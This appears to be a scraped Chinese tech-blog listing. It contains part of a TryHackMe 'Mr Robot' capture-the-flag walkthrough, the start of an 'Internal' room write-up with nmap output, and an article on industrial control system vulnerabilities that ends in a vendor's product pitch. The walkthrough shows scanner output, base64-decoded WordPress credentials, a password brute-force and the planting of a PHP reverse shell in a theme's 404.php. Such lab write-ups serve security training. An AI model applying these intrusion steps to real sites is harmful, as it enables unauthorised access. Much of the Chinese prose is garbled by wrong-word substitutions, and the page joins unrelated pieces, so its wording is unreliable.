403 - 247B - /wp-content/plugins/akismet/akismet.php[03:52:11] 403 - 228B - /wp-content/uploads/[03:52:11] 301 - 239B - /wp-includes -> http://10.10.180.172/wp-includes/[03:52:11] 403 - 221B - /wp-includes/[03:52:16] 301 - 0B - /webadmin/index.php -> http://10.10.180.172/webadmin/[03:52:30] 302 - 0B - /wp-admin/ -> http://10.10.180.172/wp-login.php?redirect_to=http%3A%2F%2F10.10.180.172%2Fwp-admin%2F&reauth=1[03:52:31] 500 - 3KB - /wp-admin/setup-config.php[03:52:35] 200 - 0B - /wp-content/ [03:52:37] 200 - 0B - /wp-content/plugins/google-sitemap-generator/sitemap-core.php[03:52:37] 500 - 0B - /wp-includes/rss-functions.php[03:52:37] 200 - 3KB - /wp-login [03:52:38] 200 - 3KB - /wp-login.php [03:52:38] 200 - 3KB - /wp-login/[03:52:38] 301 - 0B - /wp-register.php -> http://10.10.180.172/wp-login.php?action=register[03:52:51] 405 - 42B - /xmlrpc.php wpscan开掘wordpress信息,没什么有用的信息,枚举authid也无奈爆破wordpress用户名┌──(rootkali)-[~/tryhackme/mrrobot]└─# wpscan --url http://10.10.180.172 _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.8.14 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart_______________________________________________________________[+] URL: http://10.10.180.172/ [10.10.180.172][+] Started: Wed Sep 15 02:55:03 2021Interesting Finding(s):[+] Headers | Interesting Entries: | - Server: Apache | - X-Mod-Pagespeed: 1.9.32.3-4523 | Found By: Headers (Passive Detection) | Confidence: 100%[+] robots.txt found: http://10.10.180.172/robots.txt | Found By: Robots Txt (Aggressive Detection) | Confidence: 100%[+] XML-RPC seems to be enabled: http://10.10.180.172/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access[+] The external WP-Cron seems to be enabled: http://10.10.180.172/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299[+] WordPress version 4.3.1 identified (Insecure, released on 2015-09-15). | Found By: Emoji Settings (Passive Detection) | - http://10.10.180.172/d6f242c.html, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.3.1' | Confirmed By: Meta Generator (Passive Detection) | - http://10.10.180.172/d6f242c.html, Match: 'WordPress 4.3.1'[+] WordPress theme in use: twentyfifteen | Location: http://10.10.180.172/wp-content/themes/twentyfifteen/ | Last Updated: 2021-07-22T00:00:00.000Z | Readme: http://10.10.180.172/wp-content/themes/twentyfifteen/readme.txt | [!] The version is out of date, the latest version is 3.0 | Style URL: http://10.10.180.172/wp-content/themes/twentyfifteen/style.css?ver=4.3.1 | Style Name: Twenty Fifteen | Style URI: https://wordpress.org/themes/twentyfifteen/ | Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, st... | Author: the WordPress team | Author URI: https://wordpress.org/ | | Found By: Css Style In 404 Page (Passive Detection) | | Version: 1.3 (80% confidence) | Found By: Style (Passive Detection) | - http://10.10.180.172/wp-content/themes/twentyfifteen/style.css?ver=4.3.1, Match: 'Version: 1.3'[+] Enumerating All Plugins (via Passive Methods)[i] No plugins Found.[+] Enumerating Config Backups (via Passive and Aggressive Methods) Checking Config Backups - Time: 00:12:45 <=============================================================================================================================================================> (137 / 137) 100.00% Time: 00:12:45[i] No Config Backups Found.[!] No WPScan API Token given, as a result vulnerability data has not been output.[!] You can get a free API token with 50 daily requests by registering at https://wpscan.com/register[+] Finished: Wed Sep 15 03:17:20 2021[+] Requests Done: 173[+] Cached Requests: 6[+] Data Sent: 42.372 KB[+] Data Received: 267.073 KB[+] Memory used: 209.672 MB[+] Elapsed time: 00:22:17首页命令行反对6个命令,钻研了半天,没看到有什么有用的信息prepare --->显示动画:whoismyrobot.comfsociety --->显示动画:are you ready to join fsocietyinform --->显示四张图片,表白了一些观点,没看进去有什么线索question --->显示四张图片,别离批评了patriot,executive,capitalist,businessmanwakeup --->显示一个动画,没有文字join --->留下一个邮箱在http://10.10.180.172/license.txt,关上f12,找到base64加密过的暗藏线索what you do just pull code from Rapid9 or some s@#% since when did you become a script kitty?do you want a password or something?ZWxsaW90OkVSMjgtMDY1Mgo=解密后:elliot:ER28-0652登陆进去当前,在users里收集到两个用户名和邮箱elliot Elliot Alderson elliot@mrrobot.commich05654 krista Gordon kgordon@therapist.com用下载的字典爆破mich05654账号wpscan --url http://10.10.180.172/ --usernames mich05654 --passwords /root/tryhackme/mrrobot/fsocity.dic[!] Valid Combinations Found: | Username: mich05654, Password: Dylan_2791然而登陆进去如同没什么有用的信息?回到elliot登录界面在后盾页面 Appearace->Theme Editer能够编辑在应用皮肤外面的php代码,咱们抉择404.php这个文件,上传一个反弹shell应用这个payload :https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php把代码复制到404.php,批改反弹主机信息开启监听在前台页面轻易输出一个不存在的页面,触发反弹shell -->http://10.10.180.172/asdasdda... ...

September 16, 2021 · 7 min · jiezi

关于安全:TryhackmeInternal登录爆破敏感文件泄露ssh转发

服务枚举┌──(rootkali)-[~]└─# nmap -sV -A 10.10.86.39 130 ⨯Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-13 04:02 EDTNmap scan report for internal.thm (10.10.86.39)Host is up (0.30s latency).Not shown: 998 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: | 2048 6e:fa:ef:be:f6:5f:98:b9:59:7b:f7:8e:b9:c5:62:1e (RSA)| 256 ed:64:ed:33:e5:c9:30:58:ba:23:04:0d:14:eb:30:e9 (ECDSA)|_ 256 b0:7f:7f:7b:52:62:62:2a:60:d4:3d:36:fa:89:ee:ff (ED25519)80/tcp open http Apache httpd 2.4.29 ((Ubuntu))|_http-server-header: Apache/2.4.29 (Ubuntu)|_http-title: Apache2 Ubuntu Default Page: It worksAggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%), Linux 3.2 - 4.9 (92%), Linux 3.7 - 3.10 (92%)No exact OS matches for host (test conditions non-ideal).Network Distance: 4 hopsService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTE (using port 1720/tcp)HOP RTT ADDRESS1 185.03 ms 10.13.0.12 ... 34 325.08 ms internal.thm (10.10.86.39)OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 89.21 seconds把internal.thm增加进/etc/hostsecho "10.10.86.39 internal.thm" >> /etc/hosts ...

September 14, 2021 · 6 min · jiezi

关于安全:安全系列之跨域资源共享CORS

简介什么是跨域资源共享呢? 咱们晓得一个域是由scheme、domain和port三局部来组成的,这三个局部能够惟一标记一个域,或者一个服务器申请的地址。跨域资源共享的意思就是服务器容许其余的域来拜访它本人域的资源。 CORS是一个基于HTTP-header检测的机制,本文将会具体对其进行阐明。 CORS举例为了平安起见,个别一个域发动的申请只能获取该域本人的资源,因为域资源外部的相互调用被认为是平安的。 然而随着古代浏览器技术和ajax技术的倒退,慢慢的呈现了从javascript中去申请其余域资源的需要,咱们把这样的需要叫做跨域申请。 比如说客户端从域http://www.flydean.com向域http://www.abc.com/data.json申请数据。 那么客户端是怎么晓得服务器是否反对CORS的呢? 这里会应用到一个叫做preflight的申请,这个申请只是向服务器确认是否反对要拜访资源的跨域申请,当客户端失去响应之后,才会真正的去申请服务器中的跨域资源。 尽管是客户端去设置HTTP申请的header来进行CORS申请,然而服务端也须要进行一些设置来保障可能响应客户端的申请。所以本文同时适宜前端开发者和后端开发者。 CORS protocol没错,任意一种申请要想标准化,那么必须制订规范的协定,CORS也一样,CORS protocol次要定义了HTTP中的申请头和响应头。咱们别离来具体理解。 HTTP request headers首先是HTTP的申请头。申请头是客户端申请资源时所带的数据。CORS申请头次要蕴含三局部。 第一局部是Origin,示意发动跨域资源申请的request或者preflight request源: Origin: <origin>Origin只蕴含server name信息,并不蕴含任何PATH信息。 留神,Origin的值可能为null第二局部是Access-Control-Request-Method,这是一个preflight request,通知服务器下一次真正会应用的HTTP资源申请办法: Access-Control-Request-Method: <method>第三局部是Access-Control-Request-Headers,同样也是一个preflight request,通知服务器下一次真正应用的HTTP申请中要带的header数据。header中的数据是和server端的Access-Control-Allow-Headers绝对应的。 Access-Control-Request-Headers: <field-name>[, <field-name>]*HTTP response headers有了客户端的申请,还须要服务器端的响应,咱们看下服务器端都须要设置那些HTTP header数据。 Access-Control-Allow-OriginAccess-Control-Allow-Origin示意服务器容许的CORS的域,能够指定特定的域,也能够应用*示意接管所有的域。 Access-Control-Allow-Origin: <origin> | *要留神的是,如果申请带有认证信息,则不能应用*。咱们看一个例子: Access-Control-Allow-Origin: http://www.flydean.comVary: Origin下面例子示意服务器容许接管来自http://www.flydean.com的申请,这里指定了具体的某一个域,而不是应用*。因为服务器端能够设置一个容许的域列表,所以这里返回的只是其中的一个域地址,所以还须要在上面加上一个Vary:Origin头信息,示意Access-Control-Allow-Origin会随客户端申请头中的Origin信息主动发送变动。 Access-Control-Expose-HeadersAccess-Control-Expose-Headers示意服务器端容许客户端或者CORS资源的同时可能拜访到的header信息。其格局如下: Access-Control-Expose-Headers: <header-name>[, <header-name>]*例如: Access-Control-Expose-Headers: Custom-Header1, Custom-Header2下面的例子将向客户端裸露Custom-Header1, Custom-Header2两个header,客户端能够获取到这两个header的值。 Access-Control-Max-AgeAccess-Control-Max-Age示意preflight request的申请后果将会被缓存多久,其格局如下: Access-Control-Max-Age: <delta-seconds>delta-seconds是以秒为单位。 Access-Control-Allow-Credentials这个字段用来示意服务器端是否承受客户端带有credentials字段的申请。如果用在preflight申请中,则示意后续的实在申请是否反对credentials,其格局如下: Access-Control-Allow-Credentials: trueAccess-Control-Allow-Methods这个字段示意拜访资源容许的办法,次要用在preflight request中。其格局如下: Access-Control-Allow-Methods: <method>[, <method>]*Access-Control-Allow-Headers用在preflight request中,示意真正可能被用来做申请的header字段,其格局如下: Access-Control-Allow-Headers: <header-name>[, <header-name>]*有了CORS协定的基本概念之后,咱们就能够开始应用CORS来构建跨域资源拜访了。 根本CORS先来看一个最根本的CORS申请,比方当初咱们的网站是http://www.flydean.com,在该网站中的某个页面中,咱们心愿获取到https://google.com/data/dataA,那么咱们能够编写的JS代码如下: const xhr = new XMLHttpRequest();const url = 'https://google.com/data/dataA';xhr.open('GET', url);xhr.onreadystatechange = someHandler;xhr.send();该申请是一个最根本的CORS申请,咱们看下客户端发送的申请蕴含哪些数据: ...

September 13, 2021 · 2 min · jiezi

关于安全:CEH-v8v11-Module-Slides-和-Lab-Manual-下载

课程内容CEH v8 01 Introduction to Ethical HackingCEH v8 02 Footprinting and ReconnaissanceCEH v8 03 Scanning NetworksCEH v8 04 EnumerationCEH v8 05 System HackingCEH v8 06 Trojans and BackdoorsCEH v8 07 Viruses and WormsCEH v8 08 SniffersCEH v8 09 Social EngineeringCEH v8 10 Denial of ServiceCEH v8 11 Session HijackingCEH v8 12 Hijacking Web serversCEH v8 13 Hacking Web ApplicationsCEH v8 14 SQL InjectionCEH v8 15 Hacking Wireless NetworksCEH v8 16 Hacking Mobile platformCEH v8 17 Evading IDS, Firewalls, and HoneypotsCEH v8 18 Buffer OverflowCEH v8 19 CryptographyCEH v8 20 Penetration TestingCEH v9 01 Introduction to Ethical HackingCEH v9 02 Footprinting and ReconnaissanceCEH v9 03 Scanning NetworksCEH v9 04 EnumerationCEH v9 05 System HackingCEH v9 06 Malware ThreatsCEH v9 07 SniffingCEH v9 08 Social EngineeringCEH v9 09 Denial of ServiceCEH v9 10 Session HijackingCEH v9 11 Hacking Web serversCEH v9 12 Hacking Web ApplicationsCEH v9 13 SQL InjectionCEH v9 14 Hacking Wireless NetworksCEH v9 15 Hacking Mobile PlatformsCEH v9 16 Evading IDS, Firewalls, and HoneypotsCEH v9 17 Cloud ComputingCEH v9 18 CryptographyCEH v10 01 Introduction to Ethical HackingCEH v10 02 Foot-printing and ReconnaissanceCEH v10 03 Scanning NetworksCEH v10 04 EnumerationCEH v10 05 Vulnerability AnalysisCEH v10 06 System HackingCEH v10 07 Malware ThreatsCEH v10 08 SniffingCEH v10 09 Social EngineeringCEH v10 10 Denial-of-ServiceCEH v10 11 Session HijackingCEH v10 12 Evading IDS, Firewalls, and HoneypotsCEH v10 13 Hacking Web ServersCEH v10 14 Hacking Web ApplicationsCEH v10 15 SQL InjectionCEH v10 16 Hacking Wireless NetworksCEH v10 17 Hacking Mobile PlatformsCEH v10 18 IoT HackingCEH v10 19 Cloud ComputingCEH v10 20 CryptographyCEH v11 01 Introduction to Ethical HackingCEH v11 02 Footprinting and ReconnaissanceCEH v11 03 Scanning NetworksCEH v11 04 EnumerationCEH v11 05 Vulnerability AnalysisCEH v11 06 System HackingCEH v11 07 Malware ThreatsCEH v11 08 SniffingCEH v11 09 Social EngineeringCEH v11 10 Denial-of-ServiceCEH v11 11 Session HijackingCEH v11 12 Evading IDS, Firewalls, and HoneypotsCEH v11 13 Hacking Web ServersCEH v11 14 Hacking Web ApplicationsCEH v11 15 SQL InjectionCEH v11 16 Hacking Wireless NetworksCEH v11 17 Hacking Mobile PlatformsCEH v11 18 IoT HackingCEH v11 19 Cloud ComputingCEH v11 20 Cryptography下载GiteeGithubGitlabCodeChina

September 12, 2021 · 2 min · jiezi

关于安全:涉嫌违规泄漏公司机密苹果高级工程师-Ashley-Gjøvik-被解雇

近日,苹果高级工程项目经理 Ashley Gjøvik 因涉嫌“违规泄露公司机密信息”而被辞退。8 月初的时候 ,Ashley Gjøvik 刚刚通过 Twitter 公布了无关该公司“职场霸凌”、性骚扰及工作场合不平安等治理不善的指控,随后始终处于带薪休假状态。 以下是该苹果工程师 @Ashley M. Gjøvik 在社交媒体上公布的原文: “Y'all, you're gonna need to catch your breath: this is a marathon. We're only through ~5% of the evidence I gave ER. We haven't even got to the 1st of 3 (4?) constructive terminations, let alone all the whistleblowing & safety concerns, & retaliation. Buckle up.” “Brace yourselves... I'd like to share with y'all an email I sent #Apple employee relations on July 16th detailing a list of my concerns & complaints (with associated Box folders & relevant evidence). #Harassment, #Discrimination, #Assault, #Retaliation, more...” ...

September 10, 2021 · 1 min · jiezi

关于安全:TryhackmeRelevant

服务发现┌──(rootkali)-[~]└─# nmap -sV -Pn 10.10.150.167 -p- 255 ⨯Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-09 04:20 EDTNmap scan report for 10.10.150.167Host is up (0.32s latency).Not shown: 65527 filtered portsPORT STATE SERVICE VERSION80/tcp open http Microsoft IIS httpd 10.0135/tcp open msrpc Microsoft Windows RPC139/tcp open netbios-ssn Microsoft Windows netbios-ssn445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds3389/tcp open ms-wbt-server Microsoft Terminal Services49663/tcp open http Microsoft IIS httpd 10.049667/tcp open msrpc Microsoft Windows RPC49669/tcp open msrpc Microsoft Windows RPCService Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windowsService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 448.90 seconds剖析80和49663都开启了http服务,目录爆破没有发现什么乏味的货色445貌似存在永恒之蓝破绽,然而没有攻打胜利 ...

September 10, 2021 · 3 min · jiezi

关于安全:如何让用户触达更高效华为AppGallery-Connect短信服务上线

在利用拉新、促活、留存、召回、转化等各个环节都须要进行用户触达。为了帮忙开发者更高效、精准地触达指标用户,华为利用市场AppGallery Connect(简称AGC)面向企业开发者重磅推出“短信服务”。 AGC短信服务笼罩中国大陆地区三大运营商,反对短信签名与短信模板,笼罩验证码短信、告诉短信和会员营销短信三大典型利用场景。其中验证码短信可实现秒级触达,达到率高达99.9%,实发率100%。短信服务接入便捷,可在1天内实现技术对接,且短信通道高效稳固,反对海量并发,助力开发者疾速发展利用业务。 更不便的是,开发者能够将短信服务与华为剖析、App Linking等服务联合应用,例如,联合华为剖析提供的受众群组,针对沉闷用户、潜在散失用户等群组精准推送营销信息,实现精准促活、召回及转化等目标;联合App Linking创立的流动内容链接,当用户点击短信内容的链接时,可拉起App并中转指定内容页面,疏导用户参加,晋升转化成果。 在“验证码短信”场景中,开发者能够利用短信服务发送验证码短信,实现用户注册登录、领取认证、密码找回等性能。 在“告诉短信”场景中,开发者能够利用短信服务发送告诉短信,为用户提供生存服务类告诉,如订单告诉、物流告诉、领取告诉等。 在“会员营销短信”场景中,开发者能够利用短信服务面向会员发送营销短信,内容可自定义,满足新品宣传、会员关心、商品促销、流动邀请等推广需要。营销短信还可反对用户回复,实现双向连贯,帮忙开发者与用户之间进行即时无效的互动。 如何开明AGC短信服务?如何疾速实现API接入发送短信?请拜访AppGallery Connect官网查看开发文档或者发送邮件征询(agconnect@huawei.com)。欢送征询(电话:18138480943;邮箱:yangjie243@huawei.com)

September 10, 2021 · 1 min · jiezi

关于安全:tryhackmeDaily-Buglesql注入漏洞根据yum命令的sudo提权

服务枚举┌──(rootkali)-[~/tryhackme]└─# nmap -sV 10.10.36.72 Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-02 05:45 EDTNmap scan report for 10.10.36.72Host is up (0.34s latency).Not shown: 997 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.4 (protocol 2.0)80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.6.40)3306/tcp open mysql MariaDB (unauthorized)Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 21.94 seconds目录爆破──(rootkali)-[~/dirsearch]└─# python3 dirsearch.py -u "http://10.10.36.72" -e* -w /usr/share/wordlists/Web-Content/directory-list-2.3-medium.txt -t 100 _|. _ _ _ _ _ _|_ v0.3.8(_||| _) (/_(_|| (_| )Extensions: * | HTTP method: get | Threads: 100 | Wordlist size: 220521Error Log: /root/dirsearch/logs/errors-21-09-02_05-48-23.logTarget: http://10.10.36.72[05:48:23] Starting: [05:48:25] 200 - 9KB - /[05:48:25] 301 - 234B - /images -> http://10.10.36.72/images/[05:48:26] 301 - 235B - /modules -> http://10.10.36.72/modules/[05:48:31] 301 - 237B - /templates -> http://10.10.36.72/templates/[05:48:31] 301 - 233B - /media -> http://10.10.36.72/media/[05:48:31] 301 - 231B - /bin -> http://10.10.36.72/bin/[05:48:31] 301 - 235B - /plugins -> http://10.10.36.72/plugins/[05:48:32] 301 - 236B - /includes -> http://10.10.36.72/includes/[05:48:33] 301 - 236B - /language -> http://10.10.36.72/language/[05:48:33] 301 - 238B - /components -> http://10.10.36.72/components/[05:48:33] 301 - 233B - /cache -> http://10.10.36.72/cache/[05:48:34] 301 - 237B - /libraries -> http://10.10.36.72/libraries/[05:48:41] 301 - 231B - /tmp -> http://10.10.36.72/tmp/[05:48:42] 301 - 235B - /layouts -> http://10.10.36.72/layouts/[05:48:49] 301 - 241B - /administrator -> http://10.10.36.72/administrator/[05:49:43] 301 - 231B - /cli -> http://10.10.36.72/cli/ Task Completed存在robots.txt文件,泄露相干文件夹,与爆破进去的基本一致# If the Joomla site is installed within a folder # eg www.example.com/joomla/ then the robots.txt file # MUST be moved to the site root # eg www.example.com/robots.txt# AND the joomla folder name MUST be prefixed to all of the# paths. # eg the Disallow rule for the /administrator/ folder MUST # be changed to read # Disallow: /joomla/administrator/## For more information about the robots.txt standard, see:# http://www.robotstxt.org/orig.html## For syntax checking, see:# http://tool.motoricerca.info/robots-checker.phtmlUser-agent: *Disallow: /administrator/Disallow: /bin/Disallow: /cache/Disallow: /cli/Disallow: /components/Disallow: /includes/Disallow: /installation/Disallow: /language/Disallow: /layouts/Disallow: /libraries/Disallow: /logs/Disallow: /modules/Disallow: /plugins/Disallow: /tmp/用msf探测版本──(rootkali)-[~]└─# msfconsole -q 1 ⨯msf6 > use auxiliary/scanner/http/joomla_versionmsf6 auxiliary(scanner/http/joomla_version) > optionsModule options (auxiliary/scanner/http/joomla_version): Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / yes The base path to the Joomla application THREADS 1 yes The number of concurrent threads (max one per host) VHOST no HTTP server virtual hostmsf6 auxiliary(scanner/http/joomla_version) > set rhosts 10.10.36.72rhosts => 10.10.36.72msf6 auxiliary(scanner/http/joomla_version) > run[*] Server: Apache/2.4.6 (CentOS) PHP/5.6.40[+] Joomla version: 3.7.0[*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completed失去cms版本Joomla version: 3.7.0 ...

September 6, 2021 · 6 min · jiezi

关于安全:携手强化内容审核能力融云与数美科技达成战略合作

近日,寰球互联网通信云服务当先厂商「融云」与业余的在线业务风控解决方案提供商「数美科技」正式达成策略单干。 单方将依靠融云提供 IM+RTC+X “全”通信解决方案的实力,以及数美科技全栈式内容风控的技术背景,携手强化图文音视内容审核能力,共建互联网通信行业内容新生态,为开发者的业务平安“保驾护航”。 文末有福利,不要错过~融云 COO 董晗示意:“数美科技作为一家业余的在线业务风控解决方案提供商,领有多年的危险内容辨认教训,与数美科技达成策略单干,是融云联结产业链、构建通信大生态的重要一步,单方将各尽所长,携手为开发者提供多维撑持。置信将来在与数美科技的单干中,融云将开释更大的服务势能,以“IM+RTC+X”的整合能力,为开发者提供更加优质、更加全面的通信解决方案。” 数美科技 CTO 梁堃示意:“融云在即时通讯和实时音视频通信畛域的市场份额均处于行业领先地位,其服务曾经笼罩寰球简直所有国家和地区,数美科技与融云在‘所有为了开发者’的服务理念上深度符合。此次与融云‘牵手’,将助力咱们更加贴近开发者需要,继续精进本身产品与服务。数美科技将施展在内容风控方面的技术实力,守护好融云几十万开发者的业务平安。” 内容风控,平台“生死小事” 近年来,随着挪动互联网的迅猛发展,各种数字产品状态风潮迭起,趣味社交、娱乐直播、电商带货、互动游戏……孕育有数机会的同时,也暗藏埋伏的危险 —— 是“风口”,也是“危险口”。 受利益的引诱与驱使,涉黄、涉政、暴恐、低俗等守法违禁信息,以各种模式泛滥于网络,让各大平台利用防不胜防,一直被迫充当着间接“作恶工具”,随之而来的是约谈、整顿、甚至关停,无穷无尽的损失与麻烦。在内容监管日趋谨严、行政监管愈发严格的大环境之下,令各大平台利用忧心忡忡的不再只有“流量”,还有“合规”和“内容平安”。平台必须承当起主体责任,“大步快跑”的同时,增强正向疏导,严防内容危险。 过来,在内容审核方面,互联网“老大哥”们往往通过减少审核人员规模来解决问题,动辄上万人的内容审核团队,让其余一众中小厂商望而生畏。而随着互联网内容愈发繁冗且海量,信息流传状态更加多样化,音视频等新的媒介模式衰亡,传统的人工审核曾经无奈再从容应对内容平安危机。 正是在这样的行业背景之下,融云与数美科技正式达成了策略单干。 单方的强强联手,让无论是“大厂”还是“小厂”,都有机会在集成通信云平台能力的同时,享受到全栈式智能内容辨认技术所带来的“安全感”,从而没有后顾之忧地在市场上开疆拓土,奋勇“杀”敌。 强强联手,不止内容平安 目前,融云与数美科技的单干次要聚焦在“内容平安”畛域,联合人工智能技术打造全栈式智能内容辨认产品,帮忙社交、直播、电商、游戏等行业的开发者,精准辨认即时通讯、实时音视频通信场景中的文本、图片、语音、视频等各类违规内容,为开发者提供高效、精确、全面的内容审核过滤服务。 作为具备“开发者基因”的互联网通信云服务商,融云所有决策的出发点都是为了开发者。近期融云发表实现“IM+RTC+X”的策略降级,在即时通讯和实时音视频的双核心能力之上,减少 X 元素 —— 通信周边能力的总和,全效赋能开发者。而“审核”作为重要的 X 能力之一,也率先成为融云关注的重点。 此次抉择数美科技成为重要策略合作伙伴,将其风控审核能力集成到融云通信云产品之中,可能在便捷性、即时性、稳固可靠性等各个方面,为开发者提供极大的助力: 1.融云从业余角度筛选出优质第三方服务商,能够省去开发者自行调研、对接第三方接口的过程,开发者通过融云后盾即可一键开明对接、设置审核策略,升高开发的工夫和老本,集成便捷性大幅晋升。 2.“通信”与“审核”的无痕对接,可能缩小音讯在两头多方周转的流程和周期,使得通过审核的音讯下发得更加及时,用户体验更加晦涩,两头出错的环节也更少。 3.让融云而不是开发者本人与第三方对接,意味着融云、数美科技两大通过海量用户测验的牢靠服务器之间的互连,业余团队全程经营撑持,防止因开发者服务器不稳固而造成通信中断,为业务稳定性保驾护航。 4.通过融星散成数美科技的审核能力,能够享受毫秒级回调告诉服务,审核后果既能够回调到终端用户手机端作提醒,也能够回调到应用服务器侧,供开发者汇总,进而进行二次审核确认,实现本身的业务逻辑解决。 5.融云与数美科技单方基于各自的劣势,无论在老客户的平滑迁徙,还是新客户的秒级接入方面,都能让开发者享受到安心无痕的通信服务体验。 将来,单方还将在解决营销欺诈、领取风控、数据盗爬、欺诈广告等“业务平安”畛域开展单干,以高准确率、毫秒级响应速度、灵便场景化定制、高效便捷的对接计划,联手为开发者继续提供弱小的平安爱护。 限时收费,内容审核福利放送 为庆贺策略单干达成,回馈新老客户的反对与青睐,融云联结数美科技,推出限时收费「审核内容危险」服务,24 小时即可生成具体检测报告。快来扫码参加,测测你的产品内容危险值吧。 反对审核的利用场景包含:辨认聊天中含有的涉黄、守法信息内容;辨认用户昵称、签名、头像中的违规内容;辨认灌水论坛、广告等垃圾内容;审核直播平台、FM 电台等音视频内容等。 审核流程为:受权审核 - 平安审核 - 生成审核报告。

September 6, 2021 · 1 min · jiezi

关于安全:222

python 绝技 第一章是python入门语法,两个须要编写的程序别离是用字典攻打法破解UNIX口令,暴力破解ZIP文件,两者都是使用暴力法间接进行破解,另外第一个程序在以后的网络环境中曾经不太实用了,咱们将其降级为破解SHA-512 hash

September 5, 2021 · 1 min · jiezi

关于安全:9月第一周工控系统漏洞持续增长企业该如何预防

近日,网络安全公司Claroty公布的一份新报告显示,越来越多的公司披露其工业控制系统(ICS)的破绽,以及对要害基础设施的网络攻击减少。 工控破绽继续减少,安全事故频发据理解,ICS破绽披露正在显著放慢,2021年上半年披露了约637个ICS破绽,比2020年下半年披露的449个破绽减少了41%。71%的破绽被归类为高或重大破绽,反映了危险裸露的高严重性和影响性及其对经营的潜在危险。而披露的破绽影响普渡模型的各个层面,包含经营治理(23.55%)、监督控制(14.76%)和根本管制(15.23%),用于监控传感器、泵、执行器等设施。 “随着越来越多的企业通过将其连贯到云来实现工业流程的现代化,它们也为威逼行为人提供了更多通过勒索和勒索攻打危害工业经营的形式。”Claroty钻研副总裁阿米尔·普莱明格(Amir Preminger)示意。 家喻户晓,工控零碎作为要害信息基础设施的组成部分,曾经成为攻击者的攻打指标之一。与之对应的是,外部零碎操作简单,人员素质参差不齐导致的外部安全隐患也错中简单。 1)工控零碎存在大量用户误操作、用户违规操作、非法设施接入行为,不足无效伎俩对攻打及违规操作进行检测。2)现有的工业控制系统不足对用户操作、网络行为的审计措施,导致安全事故剖析取证艰难。3)工控零碎资产简单、设施品种繁多、运行工夫久、资产不分明。无论从技术改革还是业务需要的层面,越来越多的工业控制系统将裸露在危险之中。 从技术改革层面来看,随着攻打技术的倒退,对物理隔离的生产零碎进行攻打也能够做到,只有有网络、有计算单元就可能被攻打并带来严重损失甚至重大平安生产事变。将来随着工业4.0以及工业智能化的倒退、新技术的利用,将给工业控制系统带来更多弱点裸露面和攻打的可能。 从业务需要的角度来看,随着工业生产管制网络逐渐与生产企业ERP零碎连贯,ERP再与办公网-互联网连贯,工业管制网络就逐渐裸露在互联网上,离攻打威逼越来越近。将来的工业4.0将链接消费者、生产者以及供应商和渠道商,网络裸露面和面临的攻打威逼将更大,安全事件带来的损失也将更大。 近3年来工控安全事件频发,2021年5月,美国东部输油管道遭勒索软件攻打被迫敞开,导致美国公共安全进入紧急状态。8851公里长的输油管道影响美国17个州燃料供给,成为往年典型的工控安全事件。 而同类事变还有,例如2021年4月伊朗纳坦兹核设施蹊跷断电;2020年6月巴西电力遭逢勒索软件;2020年4月以色列供水设施突遭袭击;2020年4月欧洲能源巨头EDP遭网络攻击;2020年3月钢铁制造商EVRAZ蒙受勒索软件攻打;2020年2月美国天然气管道商遭攻打…… 顶象OT-Guard四大劣势,保障工控平安工控零碎存在服务层、网络层、设施层的问题,因为网络管制高度自动化,每一层都面临潜在被攻打的危险。通过构建区域化、网格化的边界防护建设平安可信的上位管制白环境,而后基于策略的边界平安防护、流量的实时监测,智能AI关联剖析,开掘暗藏的工控现场威逼,来构建分层、分域、分档次的纵深平安防护体系。 